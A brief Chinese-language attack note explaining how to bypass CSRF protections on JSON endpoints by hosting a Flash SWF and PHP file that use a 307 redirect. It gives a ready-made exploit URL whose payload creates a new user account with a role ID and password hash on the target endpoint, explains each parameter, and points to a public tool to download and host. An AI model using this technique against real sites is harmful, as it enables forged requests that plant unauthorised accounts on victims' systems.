一:flash配合307跳转绕过
利用方式:http://remote_ip/csrf/test.swf?jsonData={"status":"0","roleId":5,"name":"csrftest_2","username":"csrftest_2","password":"637c3de5385ae556ac6bf955340a713f"}&php_url=http://remote_ip/csrf/test.php&endpoint=https://attacted_ip/dm/user?timestamp=1558073429923
remote_ip:放置test.swf、test.php文件的服务器地址
jsonData:原本需要post传输的数据
php_url:test.php文件所在的访问路径
endpoint:存在CSRF漏洞的访问地址
相关文件地址:https://github.com/sp1d3r/swf_json_csrf
下载后放置在特定的web目录下即可